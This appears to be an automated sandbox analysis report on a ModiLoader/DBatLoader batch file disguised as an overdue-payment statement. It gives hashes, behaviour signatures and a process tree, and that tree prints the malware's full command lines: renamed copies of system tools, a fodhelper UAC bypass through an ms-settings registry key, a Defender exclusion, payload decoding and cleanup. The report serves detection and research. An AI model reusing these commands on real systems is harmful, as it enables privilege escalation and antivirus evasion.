Analysis
-
max time kernel
141s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
26-03-2024 02:42
Static task
static1
Behavioral task
behavioral1
Sample
Statement Of Account - Overdue Payments #94839540823489.bat
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Statement Of Account - Overdue Payments #94839540823489.bat
Resource
win10v2004-20240226-en
General
-
Target
Statement Of Account - Overdue Payments #94839540823489.bat
-
Size
2.9MB
-
MD5
0acc894a421b72f77d8f825865710ec4
-
SHA1
e51bfe768ece4a254a5f85c977fa65dfa963c3b8
-
SHA256
e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e
-
SHA512
4faafabc07bf132657e54b4107b97dc339143439a26802589a5aae94325e38e2a37766a647baa42b1a6ee069aa2bae3f6ffc12eb6b5c7fac64a7ee06cd169f02
-
SSDEEP
24576:yn8Rm6aVrLy7bOkM75parJLzx60bCNB0PEsNl36h3vKYtKYKCgsX9t6HtzA6GC89:KomdNy7bOT5u9zgApY
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
resource yara_rule behavioral1/memory/2928-57-0x00000000030E0000-0x00000000040E0000-memory.dmp modiloader_stage2 -
Executes dropped EXE 16 IoCs
pid Process 1844 alpha.exe 1152 alpha.exe 1928 alpha.exe 2620 xkn.exe 2816 alpha.exe 2604 alpha.exe 2496 kn.exe 2524 alpha.exe 2568 kn.exe 2928 Lewxa.com 3056 alpha.exe 1704 alpha.exe 2160 alpha.exe 1632 alpha.exe 2720 alpha.exe 2792 alpha.exe -
Loads dropped DLL 10 IoCs
pid Process 2248 cmd.exe 2248 cmd.exe 2248 cmd.exe 1928 alpha.exe 2620 xkn.exe 2620 xkn.exe 2620 xkn.exe 2604 alpha.exe 1560 WerFault.exe 1560 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1560 2928 WerFault.exe 43 -
Kills process with taskkill 2 IoCs
pid Process 2564 taskkill.exe 2788 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1792 reg.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2928 Lewxa.com -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2620 xkn.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2620 xkn.exe Token: SeDebugPrivilege 2564 taskkill.exe Token: SeDebugPrivilege 2788 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2248 wrote to memory of 1680 2248 cmd.exe 29 PID 2248 wrote to memory of 1680 2248 cmd.exe 29 PID 2248 wrote to memory of 1680 2248 cmd.exe 29 PID 1680 wrote to memory of 2460 1680 cmd.exe 30 PID 1680 wrote to memory of 2460 1680 cmd.exe 30 PID 1680 wrote to memory of 2460 1680 cmd.exe 30 PID 2248 wrote to memory of 1844 2248 cmd.exe 31 PID 2248 wrote to memory of 1844 2248 cmd.exe 31 PID 2248 wrote to memory of 1844 2248 cmd.exe 31 PID 1844 wrote to memory of 1836 1844 alpha.exe 32 PID 1844 wrote to memory of 1836 1844 alpha.exe 32 PID 1844 wrote to memory of 1836 1844 alpha.exe 32 PID 2248 wrote to memory of 1152 2248 cmd.exe 33 PID 2248 wrote to memory of 1152 2248 cmd.exe 33 PID 2248 wrote to memory of 1152 2248 cmd.exe 33 PID 1152 wrote to memory of 2068 1152 alpha.exe 34 PID 1152 wrote to memory of 2068 1152 alpha.exe 34 PID 1152 wrote to memory of 2068 1152 alpha.exe 34 PID 2248 wrote to memory of 1928 2248 cmd.exe 35 PID 2248 wrote to memory of 1928 2248 cmd.exe 35 PID 2248 wrote to memory of 1928 2248 cmd.exe 35 PID 1928 wrote to memory of 2620 1928 alpha.exe 36 PID 1928 wrote to memory of 2620 1928 alpha.exe 36 PID 1928 wrote to memory of 2620 1928 alpha.exe 36 PID 2620 wrote to memory of 2816 2620 xkn.exe 37 PID 2620 wrote to memory of 2816 2620 xkn.exe 37 PID 2620 wrote to memory of 2816 2620 xkn.exe 37 PID 2816 wrote to memory of 1792 2816 alpha.exe 38 PID 2816 wrote to memory of 1792 2816 alpha.exe 38 PID 2816 wrote to memory of 1792 2816 alpha.exe 38 PID 2248 wrote to memory of 2604 2248 cmd.exe 39 PID 2248 wrote to memory of 2604 2248 cmd.exe 39 PID 2248 wrote to memory of 2604 2248 cmd.exe 39 PID 2604 wrote to memory of 2496 2604 alpha.exe 40 PID 2604 wrote to memory of 2496 2604 alpha.exe 40 PID 2604 wrote to memory of 2496 2604 alpha.exe 40 PID 2248 wrote to memory of 2524 2248 cmd.exe 41 PID 2248 wrote to memory of 2524 2248 cmd.exe 41 PID 2248 wrote to memory of 2524 2248 cmd.exe 41 PID 2524 wrote to memory of 2568 2524 alpha.exe 42 PID 2524 wrote to memory of 2568 2524 alpha.exe 42 PID 2524 wrote to memory of 2568 2524 alpha.exe 42 PID 2248 wrote to memory of 2928 2248 cmd.exe 43 PID 2248 wrote to memory of 2928 2248 cmd.exe 43 PID 2248 wrote to memory of 2928 2248 cmd.exe 43 PID 2248 wrote to memory of 2928 2248 cmd.exe 43 PID 2248 wrote to memory of 3056 2248 cmd.exe 44 PID 2248 wrote to memory of 3056 2248 cmd.exe 44 PID 2248 wrote to memory of 3056 2248 cmd.exe 44 PID 2248 wrote to memory of 1704 2248 cmd.exe 45 PID 2248 wrote to memory of 1704 2248 cmd.exe 45 PID 2248 wrote to memory of 1704 2248 cmd.exe 45 PID 2248 wrote to memory of 2160 2248 cmd.exe 46 PID 2248 wrote to memory of 2160 2248 cmd.exe 46 PID 2248 wrote to memory of 2160 2248 cmd.exe 46 PID 2248 wrote to memory of 1632 2248 cmd.exe 47 PID 2248 wrote to memory of 1632 2248 cmd.exe 47 PID 2248 wrote to memory of 1632 2248 cmd.exe 47 PID 2248 wrote to memory of 2720 2248 cmd.exe 48 PID 2248 wrote to memory of 2720 2248 cmd.exe 48 PID 2248 wrote to memory of 2720 2248 cmd.exe 48 PID 2720 wrote to memory of 2564 2720 alpha.exe 49 PID 2720 wrote to memory of 2564 2720 alpha.exe 49 PID 2720 wrote to memory of 2564 2720 alpha.exe 49
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\cmd.execmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe3⤵PID:2460
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe3⤵PID:1836
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2068
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\reg.exereg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "5⤵
- Modifies registry class
- Modifies registry key
PID:1792
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat" "C:\\Users\\Public\\Lewxa.txt" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat" "C:\\Users\\Public\\Lewxa.txt" 93⤵
- Executes dropped EXE
PID:2496
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 123⤵
- Executes dropped EXE
PID:2568
-
-
-
C:\Users\Public\Libraries\Lewxa.comC:\\Users\\Public\\Libraries\\Lewxa.com2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2928 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 8363⤵
- Loads dropped DLL
- Program crash
PID:1560
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S2⤵
- Executes dropped EXE
PID:3056
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1704
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2160
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1632
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe2⤵
- Executes dropped EXE
PID:2792 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5cde0e4350f0886229b0a605810fbe397
SHA12ebdce74856c9e858064bbf53b2c8c46c20a58da
SHA256f577452dfa0c5aab1f574fd66e8c4430687731ad062916f0b7db09189dede263
SHA512c9f15d848b499325e6a4185416af67a41cbec16884d726244bc638e52928744dc91092eaab91e224ecbf4895342c95c6ca97c8002eecc298c2ee75e0bf5c000c
-
Filesize
1.0MB
MD5701a1b8de275a64ad562d862d7e117d4
SHA1a6dcd9f802a20fa07bd2f569b0761244ab5803a7
SHA256f5ad3a45f4bea88e28aa2c541ee13ab28fa68a29af572ce2ca02960464d601ad
SHA512085a5becd2c1ceac9a0dfefdc0dc663d598062b2bfef24e3709b0998924f98836eaa0d66bc21dbda9842fead17443fbd3b69febd620639b8e1921d3b0e797a32
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d